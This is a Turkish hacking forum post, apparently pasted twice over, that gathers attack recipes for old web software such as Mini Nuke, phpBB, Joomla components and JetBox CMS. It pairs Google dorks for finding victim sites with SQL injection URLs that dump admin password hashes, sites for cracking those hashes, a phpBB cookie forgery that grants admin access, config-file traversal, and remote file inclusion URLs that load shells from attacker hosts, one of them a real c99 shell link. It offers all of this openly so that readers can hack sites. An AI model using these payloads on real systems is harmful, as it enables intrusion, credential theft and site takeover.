-MİNİ NUKE V2.3
Mini nuke sitelerle uğraşmak için ilk önce
wwww.Google.com a giriyoruz ve: 'mini-nuke v2.3' olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
http://passcrack.spb.ru
[URL="http://gdataonline.com/"]http://gdataonline.com [url]https://tik.lat/nZnFZ
https://tik.lat/MYOC4
http://www.hashchecker.com [url]https://tik.lat/AVzcH
http://md5.benramsey.com [url]https://tik.lat/ySuaz
https://tik.lat/nTjxN
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com [url]https://tik.lat/V6vZy [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken 'BENİ HATIRLA' diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3B s%3A1%3A%222%22%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A% 222%22%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------
-PHP NUKE SQL INJECTİON
www.googLe.comhttp://[sitepath]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig _absolute_path=http://site/phpshell.php
Kodunu ekliyoruz...
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
[URL="http://www.google.com/"]WWW.Google.Com [url]https://tik.lat/MK9Yh
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
----------------------------------------------------------------------------------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls
CİGİCİGİ&GPLX
-----------------------------------------------------------------------------------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google' da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absol ute_path=http://evilscript
cİGİCİGİ&GPL-X
----------------------------------------------------------------------------------------
-SİMPLE BOARD MAMBO
İlk Önce WwwW.GoogLe.com
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
https://tik.lat/Eq9s7
CİGİCİGİ&GPL-X
----------------------------------------------------------------------------------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
CİGİCİGİ&GPLX
-----------------------------------------------------------------------------------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
https://tik.lat/aWs0e
cİGİCİGİ&GPLX
------------------------------------------------------------------------------------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine'in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
CİGİCİGİ&GPLX
-------------------------------------------------------------------------------------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
https://tik.lat/FhWWc [path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
https://tik.lat/Duu8z [path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB 'deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]
CİGİCİGİ&GPLX
----------------------------------------------------------------------------------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
------------------------------------------------------------------------------------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
Mini nuke sitelerle uğraşmak için ilk önce
wwww.Google.com a giriyoruz ve: 'mini-nuke v2.3' olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
http://passcrack.spb.ru
[URL="http://gdataonline.com/"]http://gdataonline.com [url]https://tik.lat/nZnFZ
https://tik.lat/MYOC4
http://www.hashchecker.com [url]https://tik.lat/AVzcH
http://md5.benramsey.com [url]https://tik.lat/ySuaz
https://tik.lat/nTjxN
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com [url]https://tik.lat/V6vZy [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken 'BENİ HATIRLA' diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3B s%3A1%3A%222%22%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A% 222%22%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------
-PHP NUKE SQL INJECTİON
www.googLe.comhttp://[sitepath]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig _absolute_path=http://site/phpshell.php
Kodunu ekliyoruz...
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
[URL="http://www.google.com/"]WWW.Google.Com [url]https://tik.lat/MK9Yh
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
----------------------------------------------------------------------------------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls
CİGİCİGİ&GPLX
-----------------------------------------------------------------------------------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google' da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absol ute_path=http://evilscript
cİGİCİGİ&GPL-X
----------------------------------------------------------------------------------------
-SİMPLE BOARD MAMBO
İlk Önce WwwW.GoogLe.com
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
https://tik.lat/Eq9s7
CİGİCİGİ&GPL-X
----------------------------------------------------------------------------------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
CİGİCİGİ&GPLX
-----------------------------------------------------------------------------------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
https://tik.lat/aWs0e
cİGİCİGİ&GPLX
------------------------------------------------------------------------------------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine'in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
CİGİCİGİ&GPLX
-------------------------------------------------------------------------------------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
CİGİCİGİ&GPLX
--------------------------------------------------------------------------------------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
https://tik.lat/FhWWc [path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
https://tik.lat/Duu8z [path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB 'deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]
CİGİCİGİ&GPLX
----------------------------------------------------------------------------------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
------------------------------------------------------------------------------------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?